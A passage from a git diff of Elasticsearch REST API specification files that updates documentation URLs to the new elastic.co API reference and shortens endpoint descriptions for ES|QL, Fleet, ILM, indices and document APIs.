+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-stop", + "description": "Stop async ES|QL query" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json index a0e78cf4b1b74..781a1c67d70ba 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.get_query.json @@ -2,15 +2,13 @@ "esql.get_query": { "documentation": { "url": null, - "description": "Executes a get ESQL query request" + "description": "Get a specific running ES|QL query information" }, "stability": "experimental", "visibility": "public", "headers": { - "accept": [], - "content_type": [ - "application/json" - ] + "accept": ["application/json"], + "content_type": ["application/json"] }, "url": { "paths": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json index c4f5abcdcb7a3..a0d5341a0dacc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.list_queries.json @@ -2,7 +2,7 @@ "esql.list_queries": { "documentation": { "url": null, - "description": "Executes a list ESQL queries request" + "description": "Get running ES|QL queries information" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json index 28a488a20528f..c15f6fb8fe88a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.query.json @@ -1,8 +1,8 @@ { "esql.query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-query-api.html", - "description":"Executes an ESQL request" + "url":"https://www.elastic.co/docs/explore-analyze/query-filter/languages/esql-rest", + "description":"Run an ES|QL query" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json b/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json index 99e9793ebffe4..e1d65a06d3780 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/exists.json @@ -1,8 +1,8 @@ { "exists":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns information about whether a document exists in an index." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Check a document" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json b/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json index 3cad1ab5fd7d0..221a7dac4efd6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/exists_source.json @@ -1,8 +1,8 @@ { "exists_source":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns information about whether a document source exists in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Check for a document source" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json b/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json index 8b25836d97154..b3d0aad8aa9ef 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json @@ -1,8 +1,8 @@ { "explain":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-explain.html", - "description":"Returns information about why a specific matches (or doesn't match) a query." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-explain", + "description":"Explain a document match result" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json index 6d5e8b5aa5698..652ebcf052f21 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json @@ -1,8 +1,8 @@ { "features.get_features":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-features-api.html", - "description":"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-get-features", + "description":"Get the features" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json index dec102a681c81..f1791e0ec2e0c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json @@ -1,8 +1,8 @@ { "features.reset_features":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Resets the internal state of features, usually by deleting system indices" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-reset-features", + "description":"Reset the features" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json b/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json index 
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json b/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json
index 8b25836d97154..b3d0aad8aa9ef 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/explain.json
@@ -1,8 +1,8 @@
 {
 "explain":{
 "documentation":{
- "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-explain.html",
- "description":"Returns information about why a specific matches (or doesn't match) a query."
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-explain",
+ "description":"Explain a document match result"
 },
 "stability":"stable",
 "visibility":"public",
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json
index 6d5e8b5aa5698..652ebcf052f21 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/features.get_features.json
@@ -1,8 +1,8 @@
 {
 "features.get_features":{
 "documentation":{
- "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-features-api.html",
- "description":"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot"
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-get-features",
+ "description":"Get the features"
 },
 "stability":"stable",
 "visibility":"public",
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json
index dec102a681c81..f1791e0ec2e0c 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/features.reset_features.json
@@ -1,8 +1,8 @@
 {
 "features.reset_features":{
 "documentation":{
- "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html",
- "description":"Resets the internal state of features, usually by deleting system indices"
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-reset-features",
+ "description":"Reset the features"
 },
 "stability":"experimental",
 "visibility":"public",
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json b/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json
index 27962b6ac10b2..f062eacdaa505 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/field_caps.json
@@ -1,8 +1,8 @@
 {
 "field_caps":{
 "documentation":{
- "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-field-caps.html",
- "description":"Returns the information about the capabilities of fields among multiple indices."
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-field-caps",
+ "description":"Get the field capabilities"
 },
 "stability":"stable",
 "visibility":"public",
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json
index fc950dab3f665..9c83cd7d2ace2 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.delete_secret.json
@@ -2,7 +2,7 @@
 "fleet.delete_secret": {
 "documentation": {
 "url": null,
- "description": "Deletes a secret stored by Fleet."
+ "description": "Deletes a secret stored by Fleet"
 },
 "stability": "experimental",
 "visibility":"private",
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json
index f58d0735c8230..861814fa6d873 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.get_secret.json
@@ -2,7 +2,7 @@
 "fleet.get_secret": {
 "documentation": {
 "url": null,
- "description": "Retrieves a secret stored by Fleet."
+ "description": "Retrieves a secret stored by Fleet"
 },
 "stability": "experimental",
 "visibility":"private",
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json
index 97618bec8f4fb..f2c67e54d5d13 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.global_checkpoints.json
@@ -1,8 +1,8 @@
 {
 "fleet.global_checkpoints":{
 "documentation":{
- "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/get-global-checkpoints.html",
- "description": "Returns the current global checkpoints for an index. This API is design for internal use by the fleet server project."
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-fleet",
+ "description": "Get global checkpoints"
 },
 "stability":"stable",
 "visibility":"public",
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json
index 3a9bf254e53b1..d805fbfb050be 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.msearch.json
@@ -2,7 +2,7 @@
 "fleet.msearch":{
 "documentation":{
 "url": null,
- "description": "Multi Search API where the search will only be executed after specified checkpoints are available due to a refresh. This API is designed for internal use by the fleet server project."
+ "description": "Run multiple Fleet searches" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json index a16369cd29e9b..5d5bbef5a3da8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.post_secret.json @@ -2,7 +2,7 @@ "fleet.post_secret": { "documentation": { "url": null, - "description": "Creates a secret stored by Fleet." + "description": "Creates a secret stored by Fleet" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json index b4e0ff5b3c5cb..1360853eaa72e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/fleet.search.json @@ -2,7 +2,7 @@ "fleet.search":{ "documentation":{ "url": null, - "description": "Search API where the search will only be executed after specified checkpoints are available due to a refresh. This API is designed for internal use by the fleet server project." + "description": "Run a Fleet search" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get.json index 62eb47821e0aa..ce080dd6478c2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get.json @@ -1,8 +1,8 @@ { "get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns a document." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Get a document by its ID" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json index ae11aa0736307..f69f23ea9ae35 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script.json @@ -1,8 +1,8 @@ { "get_script":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Returns a script." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script", + "description":"Get a script or search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json index 332b57d791779..9886f24a55ceb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_context.json @@ -1,8 +1,8 @@ { "get_script_context":{ "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/painless/master/painless-contexts.html", - "description":"Returns all script contexts." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-context", + "description":"Get script contexts" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json index 9c228017f0b20..65e84ea4291d3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_script_languages.json @@ -1,8 +1,8 @@ { "get_script_languages":{ "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Returns available script types, languages and contexts" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-languages", + "description":"Get script languages" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json b/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json index a17ae4b027fd5..b5419aed3803e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/get_source.json @@ -1,8 +1,8 @@ { "get_source":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html", - "description":"Returns the source of a document." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get", + "description":"Get a document's source" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json b/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json index 311716fd6b484..aa8fcb57a03aa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/graph.explore.json @@ -1,8 +1,8 @@ { "graph.explore":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/graph-explore-api.html", - "description": "Explore extracted and summarized information about the documents and terms in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-graph", + "description": "Explore graph analytics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json b/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json index 2cc9b8f008311..1ea610915cf87 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/health_report.json @@ -1,8 +1,8 @@ { "health_report": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/health-api.html", - "description": "Returns the health of the cluster." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-health-report", + "description": "Get the cluster health" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json index cd6397fb61586..751bd5888533c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.delete_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.delete_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-delete-lifecycle.html", - "description": "Deletes the specified lifecycle policy definition. A currently used policy cannot be deleted." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-delete-lifecycle", + "description": "Delete a lifecycle policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json index 94c37adb802f6..79ae1ad7146ea 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.explain_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-explain-lifecycle.html", - "description": "Retrieves information about the index's current lifecycle state, such as the currently executing phase, action, and step." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-explain-lifecycle", + "description": "Explain the lifecycle state" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json index 5abdfac7f5b30..722822fb30c2b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.get_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-get-lifecycle.html", - "description": "Returns the specified policy definition. Includes the policy version and last modified date." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-lifecycle", + "description": "Get lifecycle policies" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json index eba1b93c1e4b0..ccfb4e53b7837 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json @@ -1,8 +1,8 @@ { "ilm.get_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-get-status.html", - "description":"Retrieves the current index lifecycle management (ILM) status." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-status", + "description":"Get the ILM status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json index 78bcb182ec74f..d51ec58ed35b3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json @@ -1,8 +1,8 @@ { "ilm.migrate_to_data_tiers":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-migrate-to-data-tiers.html", - "description": "Migrates the indices and ILM policies away from custom node attribute allocation routing to data tiers routing" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-migrate-to-data-tiers", + "description": "Migrate to data tiers routing" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json index 3f46b8fa913b0..34485ff1de2e4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json @@ -1,8 +1,8 @@ { "ilm.move_to_step":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-move-to-step.html", - "description":"Manually moves an index into the specified step and executes that step." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-move-to-step", + "description":"Move to a lifecycle step" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json index b7fdbe04a0ffb..47c1f6c6d56f6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.put_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-put-lifecycle.html", - "description":"Creates a lifecycle policy" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-put-lifecycle", + "description":"Create or update a lifecycle policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json index bc684186e15a4..020a9cfc05848 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json @@ -1,8 +1,8 @@ { "ilm.remove_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-remove-policy.html", - "description":"Removes the assigned lifecycle policy and stops managing the specified index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-remove-policy", + "description":"Remove policies from an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json 
b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json index b567d9b73cb16..2097d90aae59f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json @@ -1,8 +1,8 @@ { "ilm.retry":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-retry-policy.html", - "description":"Retries executing the policy for an index that is in the ERROR step." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-retry", + "description":"Retry a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json index 7141673ff9a9d..c2128e04179b4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json @@ -1,8 +1,8 @@ { "ilm.start":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-start.html", - "description":"Start the index lifecycle management (ILM) plugin." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-start", + "description":"Start the ILM plugin" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json index 962fa77263ee4..81bcb68ea8873 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json @@ -1,8 +1,8 @@ { "ilm.stop":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-stop.html", - "description":"Halts all lifecycle management operations and stops the index lifecycle management (ILM) plugin" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-stop", + "description":"Stop the ILM plugin" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/index.json index 79ecbd794024a..e36ebdaaeaad3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/index.json @@ -1,8 +1,8 @@ { "index":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html", - "description":"Creates or updates a document in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create", + "description":"Create or update a document in an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json index 24738d1f5bb27..8ef8460057347 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json @@ -1,8 +1,8 @@ { "indices.add_block":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html", - "description":"Adds a block to an index." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-add-block", + "description":"Add an index block" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json index a6d8cf6cfc987..a23fbb4521bef 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json @@ -1,8 +1,8 @@ { "indices.analyze":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-analyze.html", - "description":"Performs the analysis process on a text and return the tokens breakdown of the text." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-analyze", + "description":"Get tokens from text analysis" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json index 31cff458e357a..df3809405ef1e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json @@ -1,8 +1,8 @@ { "indices.cancel_migrate_reindex":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-stream-reindex-cancel-api.html", - "description":"This API returns the status of a migration reindex attempt for a data stream or index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-cancel-migrate-reindex", + "description":"Cancel a migration reindex operation" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json index 064a7573b3224..eb4f2cac70e34 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json @@ -1,8 +1,8 @@ { "indices.clear_cache":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clearcache.html", - "description":"Clears all or specific caches for one or more indices." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clear-cache", + "description":"Clear the cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json index 43a6383a1e75f..da6993c25f0c3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json @@ -1,8 +1,8 @@ { "indices.clone": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clone-index.html", - "description": "Clones an index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clone", + "description": "Clone an index" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json index 0738216d1ee86..04f6e56d591ef 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json @@ -1,8 +1,8 @@ { "indices.close":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html", - "description":"Closes an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-close", + "description":"Close an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json index 